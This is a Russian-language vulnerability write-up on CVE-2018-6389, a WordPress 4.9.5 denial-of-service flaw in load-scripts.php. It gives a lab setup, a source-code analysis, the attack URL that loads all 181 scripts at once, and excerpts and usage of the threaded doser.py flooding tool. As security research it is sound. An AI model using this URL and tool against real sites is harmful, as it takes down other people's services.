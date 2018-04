В WordPress, самой популярной CMS в мире, была найдена ошибка, которая позволяет вызывать отказ в обслуживании сайта, то есть DoS. Успешную эксплуатацию с легкостью возможно провести удаленно, и для этого не нужно обладать никакими правами в системе.

Брешь была обнаружена израильским ресерчером Бараком Тавили (Barak Tawily aka Quitten), когда он изучал очередной проект на WordPress. Уязвимость получила идентификатор CVE-2018-6389 и присутствует на тысячах сайтов по всему миру, так как разработчики из WordPress Foundation не спешат признавать серьезность проблемы и исправлять ее. В результате от бага не избавлены даже самые свежие на момент написания статьи версии CMS — 4.9.5.

Итак, предлагаю посмотреть на уязвимость поближе, а там ты уже сам решишь, насколько страшен черт.

Стенд

Я уже неоднократно поднимал стенд для тестирования уязвимостей в WordPress, чтобы написать об очередной уязвимости, поэтому быстренько пробегусь по основным аспектам, не сильно вдаваясь в подробности.

По традиции используем контейнер Docker на Debian и седьмую версию PHP с Apache.

$ docker run -it --rm -p80:80 --name=wpdos --hostname=wpdos debian /bin/bash $ apt-get update && apt-get install -y mysql-server apache2 php php7.0-mysqli nano wget

Скачиваем и распаковываем WordPress версии 4.9.5:

$ cd /tmp && wget https://wordpress.org/wordpress-4.9.5.tar.gz $ tar xzf wordpress-4.9.5.tar.gz $ rm -rf /var/www/html/* && mv wordpress/* /var/www/html/ $ chown -R www-data:www-data /var/www/html/

Запускаем необходимые сервисы:

$ service mysql start && service apache2 start $ mysql -u root -e "CREATE DATABASE wpdos; GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'megapass';"

Дальше дело за установкой CMS через браузер.

Детали уязвимости

Итак, Тавили во время просмотра очередного сайта на WordPress обратил внимание на скрипт load-scripts.php . Он используется для отображения JavaScript. Названия загружаемых файлов указываются в параметре load , и при выводе их содержимое объединяется. Сделано это для того, чтобы ускорить загрузку страницы и уменьшить количество запросов к серверу.

Таким образом, чтобы браузер получил все нужные для корректного отображения файлы JS, достаточно сделать запрос на один скрипт load-scripts.php , в параметрах которого будут перечислены все необходимые файлы JavaScript. Это, кстати, довольно распространенная практика при разработке бэкенда. Та же логика у скрипта load-styles.php , только в отношении файлов CSS.

Посмотрим на исходный код load-scripts.php . Названия файлов указываются через запятую.

/wp-admin/load-scripts.php

17: $load = $_GET['load']; 18: if ( is_array( $load ) ) 19: $load = implode( '', $load ); 20: 21: $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); 22: $load = array_unique( explode( ',', $load ) );

Какие же скрипты мы можем загрузить? Разумеется, произвольный файл прочитать не получится, существует четко прописанный список разрешенных объектов.

/wp-admin/load-scripts.php

48: foreach ( $load as $handle ) { 49: if ( !array_key_exists($handle, $wp_scripts->registered) ) 50: continue; 51: 52: $path = ABSPATH . $wp_scripts->registered[$handle]->src; 53: $out .= get_file($path) . "

"; 54: }

Этот список находится в свойстве registered класса WP_Scripts и заполняется при помощи функции wp_default_scripts из файла script-loader.php .

/wp-admin/load-scripts.php

36: $wp_scripts = new WP_Scripts(); 37: wp_default_scripts($wp_scripts);

/wp-includes/script-loader.php

37: /** 38: * Register all WordPress scripts. ... 46: * @param WP_Scripts $scripts WP_Scripts object. 47: */ 48: function wp_default_scripts( &$scripts ) {

Пополняется список разрешенных к загрузке файлов при помощи метода add .

/wp-includes/script-loader.php

048: function wp_default_scripts( &$scripts ) { ... 086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); 087: 088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 ); ... 125: $scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array('utils','jquery'), false, 1 ); ...

В параметрах вызова указываются название элемента, путь до файла, зависимости от других элементов, версия и прочее.

/wp-includes/class.wp-scripts.php

18: class WP_Scripts extends WP_Dependencies {

/wp-includes/class.wp-dependencies.php

206: public function add( $handle, $src, $deps = array(), $ver = false, $args = null ) { 207: if ( isset($this->registered[$handle]) ) 208: return false; 209: $this->registered[$handle] = new _WP_Dependency( $handle, $src, $deps, $ver, $args ); 210: return true; 211: }

Полный список всех вызовов загружаемых элементов можно найти тут. Всего их 181. По умолчанию загружаются минифицированные версии скриптов.

/wp-includes/script-loader.php

67: $suffix = SCRIPT_DEBUG ? '' : '.min'; 68: $dev_suffix = $develop_src ? '' : '.min';

Идея в том, чтобы прочитать все возможные JS-файлы одним запросом. Он получается монструозным, не буду приводить его целиком, но вместо многоточия в конце должно идти еще 170 названий файлов.

http://wpdos.visualhack/wp-admin/load-scripts.php?load=utils,common,wp-a11y,sack,quicktags,colorpicker,editor,wp-fullscreen-stub,wp-ajax-response,wp-api-request,wp-pointer...

Время, прошедшее от отправления запроса до первого полученного байта ответа, равно ~500 миллисекунд. Примерно столько сервер обрабатывал этот запрос.

Каждый файл читается отдельно при помощи file_get_contents .

/wp-admin/includes/noop.php

102: function get_file( $path ) { 103: 104: if ( function_exists('realpath') ) { 105: $path = realpath( $path ); 106: } 107: 108: if ( ! $path || ! @is_file( $path ) ) { 109: return ''; 110: } 111: 112: return @file_get_contents( $path ); 113: }

Получается, что каждый запрос будет вызывать 181 операцию ввода-вывода, и если таких запросов будет много, то в скором времени у сервера могут начаться проблемы. Особенно это касается сайтов на shared-хостингах.

Автоматизируй это

Теперь давай организуем множественные запросы к такому URL. Тавили для этих целей использовал самописную утилиту под названием doser, которая выполняет запросы к серверу в указанное количество потоков. Сам скрипт написан на Python 2.7 с использованием библиотек requests и threading.

Процедура вызова проста:

$ python doser.py -g <url> -t 999

Ключ g говорит нам, что нужно отправлять запросы методом GET, а с помощью t можно указать количество потоков.

doser.py

067: def sendGET(url): ... 070: try: 071: request_counter+=1 072: request = requests.get(url, headers=headers) ... 094: while True: 095: global url 096: sendGET(url) ... 113: def main(argv): ... 115: parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'') ... 119: parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int) ... 128: for i in range(args.t): 129: t = SendGETThread()

Возможно, решение не самое быстрое и оптимальное, но скрипт работает добросовестно и с задачей справляется. После двух тысяч запросов наш простенький сервер уже недоступен для обычного пользователя.

Чтобы добавить еще немного нагрузки, можешь дополнительно отправлять запросы на загрузку файлов CSS через load-styles.php .

Демонстрация уязвимости (видео)

Выводы

Вот такой нестандартный вектор атаки. Конечно, импакт от его использования не слишком серьезный, иначе мы бы уже наблюдали массовый «падёж». Правильно настроенный выделенный сервер от такого трюка пострадать не должен. А вот на shared-хостингах стоят лимиты на потребляемые ресурсы, и, если они исчерпаются, могут возникнуть проблемы. Так, во время тестирования на одном из моих сайтов хостер заспамил мне почту сообщениями о превышении выделенных лимитов.

Почему же в WordPress не считают это своей проблемой и не торопятся исправлять? С одной стороны, разработчиков можно понять: они не несут ответственности за использование их CMS на слабых или некорректно настроенных серверах (WordPress вообще-то далеко не самая легкая CMS). Но это совсем не то, что хочется слышать от разработчиков системы, на которой работает твой блог. Проблему все равно придется фиксить, и я уверен, что есть масса безобидных способов сделать это. Да ей уже дали CVE, в конце концов!